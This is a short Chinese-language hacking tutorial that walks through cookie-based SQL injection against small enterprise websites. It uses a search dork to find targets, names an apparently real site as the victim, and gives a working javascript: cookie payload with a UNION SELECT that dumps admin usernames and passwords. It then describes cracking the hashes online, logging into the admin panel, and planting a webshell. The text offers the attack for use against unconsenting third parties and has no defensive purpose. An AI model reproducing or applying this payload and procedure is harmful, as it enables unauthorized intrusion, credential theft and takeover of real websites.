关于cookie注射的原理我就不说了 ，各位自已百度一下吧.我们直接开始吧！今天带来的是cookie注射拿企业站

首先我们直接百度或者google一下

关键字：inurl:CompHonorBig.asp?id 出现了很多站点..百度一下，找到相关网页约35,700篇，用时0.231秒

我们到后面几页随便打开一个 http://www.xzruizhe.com/

打开教学教研这个栏目随便找到一篇文件..地址为;http://www.xzruizhe.com/shownews.asp?id=225&BigClass=产品展示

现在我们可以开始输入注射语句了：

javascript:alert(document.cookie="id="+escape("86 union select 1,password,username,password,5,6,7,8,9,10,11 from admin"));

输入到IE中,然后会有一个提示

然后我们点确定,然后再进入http://www.xzruizhe.com/shownews.asp

我们可以看到现在的账号和密码已经被爆出来了.

接下来我们开始破解密码了..大家可以去www.cmd5.com破解就可以了.

之后开始登陆后台咯

http://www.你入侵的地址.com/admin

成功登陆了...

如果各位还有什么不懂的地方大家可以在下面留言...

接下来你就可以拿webshell了,关于这套系统拿webshell的话就是一个上传，然后备份就OK了.